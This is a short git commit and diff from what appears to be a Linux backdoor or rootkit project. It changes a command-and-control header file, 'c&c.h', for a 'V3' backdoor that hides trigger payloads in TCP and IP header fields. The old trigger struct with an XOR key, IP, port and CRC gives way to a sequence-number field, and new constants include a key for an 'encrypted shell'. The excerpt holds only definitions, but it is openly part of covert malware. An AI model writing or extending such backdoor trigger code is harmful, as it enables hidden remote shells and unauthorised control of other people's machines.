Completed new backdoor packet stream parsing for V3 backdoor using hidden payloads in TCP and IP header positions

2025-12-25 02:43:07 +08:00 · 2022-05-09 16:36:39 -04:00
parent ba19537ec1
commit 073e1d3129
10 changed files with 2591 additions and 1814 deletions
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -27,13 +27,10 @@

 //C&C V3 -- Distributed hidden payload in packet stream
 struct trigger_t {
-    unsigned char xor_key;
-    unsigned int ip;
-    short unsigned int port;
-    unsigned char pad1;
-    short unsigned int pad2;
-    short unsigned int crc;
+    unsigned int seq_raw;
 };
+#define CC_STREAM_TRIGGER_PAYLOAD_LEN 12
+#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES 4
 #define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL "\x2C\x82"